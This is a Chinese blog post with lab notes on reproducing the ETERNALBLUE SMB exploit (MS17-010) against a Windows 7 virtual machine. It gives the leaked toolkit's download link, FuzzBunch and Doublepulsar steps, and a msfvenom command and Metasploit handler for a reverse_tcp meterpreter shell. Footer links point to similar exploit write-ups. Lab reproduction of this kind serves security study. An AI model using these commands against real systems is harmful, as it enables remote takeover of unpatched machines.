方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记

最新推荐文章于 2024-08-21 10:29:29 发布
最新推荐文章于 2024-08-21 10:29:29 发布
阅读量1.5w 收藏 7
点赞数 4
分类专栏: 漏洞复现 文章标签: 漏洞 方程式ETERNALBLUE SMB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/captain51/article/details/70195365
版权

0x01  环境搭建

  1. win2003 攻击机,ip:192.168.0.28
  2. kali 攻击机,ip:192.168.0.27
  3. win7 靶机,ip:192.168.0.14;netstat -an 查看端口开发情况,确保445端口开启
  4. 另外:win2003攻击机需要有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。
  5. 方程式ETERNALBLUE 下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。
  7. 在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致

0x02  测试过程

  1. 进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。
  3. 根据提示,输入0创建一个新的项目,项目名为test
  5. 接下来使用use Eternalblue,一路回车:
  7. 这里要注意,根据提示选项,这里选择1,然后继续一路回车

  9. 在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=5555 -f dll > /opt/s.dll

  10. 在msf下开启msfpaylod监听:

    use exploit/multi/handler

    set lhost 192.168.0.27

    set lport 5555

    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    exploit

  11. 接下来继续在windows2003上执行use Doublepulsar
  13. 根据提示选择对应系统,运行dll文件,设置dll文件路径
  15. 最后在MSF中可以看到,成功反弹shell,拿到系统权限。

0x03  参考文档

  • TOOLS文章:http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374058&idx=1&sn=2ac09acae4fe70ca80446c3385feb90c&chksm=beb07c1689c7f500cad4fb3f8e2e76f31220b569ef3617e440dacb6cbe646958065ec9493f37&mpshare=1&scene=23&srcid=0416plWIdYQXxZ61ZUEd2foy#rd
  • 边界安全文章:http://mp.weixin.qq.com/s?__biz=MzI0MzQyNzI2OA==&mid=2247484335&idx=1&sn=b5ad15e967aa13a729ee3c5890320038&chksm=e96c7104de1bf81216500f50a62a335579916b32d7ccf8b94402922fa97bb005faceea876b52&mpshare=1&scene=23&srcid=0416ztWMmZGOSUjFbBMED29b#rd
Captain丶
关注
专栏目录
漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
做自己喜欢的事,并将其发挥到极致!
03-07 8329
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现
热门推荐
时光隧道
08-26 5万+
Metasploit :是一款开源的安全漏洞检测工具。 fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具。 主要工具简介: EternalBlue(永恒之蓝) : SMBv1 漏洞攻击工具,影响所有Windows平台,还在支持期的系统打上MS17-010 可以免疫,不再支持期的系统,可以禁用SMBv1(配置注册表或组策略,需要重启) EmeraldThread(翡翠纤维)
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
远程溢出攻击
野生码农
01-24 4586
网络安全介绍 https://wenku.baidu.com/view/df861fd101f69e3142329427.html   远程溢出攻击   什么是远程溢出攻击? https://zhidao.baidu.com/question/537606563.html   大多溢出攻击都是针对缓冲区的溢出。当缓冲区溢出时,过剩的信息对电脑内存中原有内容进行完全替换,如未进行备份...
MS17-010漏洞复现+利用
Nove1205的博客
07-22 1409
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077)
最新发布
heike_Ch的博客
08-21 879
开启该服务(Windows 远程桌面授权服务)并且操作系统版本在受影响范围的 Windows Server 受影响,没有开启该服务但是操作系统版本在受影响范围的Windows Server 不受影响,Windows 10、Windows 11 等非 Server 版本的操作系统,不论是否开启Windows 远程桌面(RDS),均不受影响。这一漏洞存在于Windows远程桌面许可管理服务(RDL)中,该服务被广泛部署于开启Windows远程桌面(3389端口)的服务器,用于管理远程桌面连接许可。
Windows远程代码执行漏洞(CVE-2020-16898) 高危漏洞加固指南
乐大厨串串香飘万里
10-17 1579
序号漏洞类型风险等级漏洞主机( 操作系统及版本)1Windows TCP/IP远程代码执行漏洞(CVE-2020-16898)高Windows 漏洞详细当Windows TCP / IP堆栈不正确地处理使用选项类型25(递归DNS服务器选项)且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程执行代码漏洞。在此选项中,长度以8个字节为增量进行计数,因此长度为3的RDNSS选项的总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务器的类型,长度,保留,生存时间和地址。前四个
Windows远程桌面服务蠕虫漏洞
远成伟业
08-20 579
北京时间8月14日,微软发布了8月安全更新补丁,其中包括两个关键的远程执行代码(RCE)漏洞CVE-2019-1181和CVE-2019-1182。与之前修复的“BlueKeep”漏洞(CVE-2019-0708)类似,也具有蠕虫特性,即利用这些漏洞的恶意软件可能会在无需用户交互的情况下在易受攻击的机器间进行传播。 受影响的版本: Windows 7 SP1 Windows Serve...
计算机病毒与防护:windows系统漏洞ms利用.ppt
06-10
在Metasploit中,他们可以搜索ms17-010,然后选择exploit/windows/smb/ms17_010_eternalblue模块。设置payload为windows/x64/meterpreter/reverse_tcp,然后设置目标主机(rhost)和监听主机(lhost),即可尝试进行...
远程溢出漏洞利用程序
06-08
远程溢出工具非常好用的!应该会与很多人用到的。360会查。使用请关了360.
3389溢出工具一个图形界面的工具
05-15
软件属性: 免费软件 文件大小: 4K 软件语言: 简体中文 软件编辑: 孤剑飘摇 3389溢出工具,一个图形界面的工具
Windows TCP/IP 远程代码执行漏洞 (CVE-2022-34718)环境搭建+复现
m0_60884805的博客
10-31 3351
微软上月发布的补丁包含一个可能执行代码的TCP/IP协议漏洞。IPSec是一种可以对指定类型ip流量筛选过滤,并加密验证的一种协议。通常在VPN或者增强其他协议密码安全性的部分条件下使用。在windows中 ,我们需要搭建一个域条件下,两台对对方所有流量都加密验证的环境。因为很多时候它并不是一种默认开启的协议。
Windows Server服务 RPC 缓冲区远程溢出漏洞ms08-067复现
qq_63539335的博客
06-27 854
渗透练习:Windows Server服务 RPC 缓冲区远程溢出漏洞(ms08-067)复现,nmap,msf模块利用
Windows Server NPS 远程代码执行漏洞
Jdjdjjdjdjdje的博客
08-22 602
受影响版本中,由于 NPS 的 iassam.dll 模块未对用户可控的 dll 路径有效过滤,攻击者可调用 IAS Extension host API 接口,通过传入恶意构造的 remote unc 路径加载任意 dll 文件,进而远程执行任意代码并接管域控服务器。OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。
windows 7 ms17-010远程溢出漏洞--来自i春秋
zhangfangqioo的博客
07-05 1784
扫描目标主机开放端口nmap -sV -Pn ip查看是否开放445端口是则继续msfconsoleuse windows/smb/ms17_010_eternalblueset rhosts ipset payload set lhostset lportrun 
NSA Eternalblue SMB 远程溢出复现
公众号shadow sock7
04-25 1541
这篇写的很详细 http://www.zerokeeper.com/penetration/nsa-eternalblue-smb-remote-overflow-replication.html
NSA Eternalblue SMB漏洞分析
weixin_34413357的博客
09-19 409
本文讲的是NSA Eternalblue SMB漏洞分析,在Shadow Brokers公开的NSA黑客工具中,Eternalblue(永恒之蓝)是影响Windows平台的SMB漏洞攻击工具。360Vulcan Team的@pgboy1988对此漏洞进行了技术分析。 环境 EXPLOIT: Eternalblue-2.2.0.exe TARGET: w...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值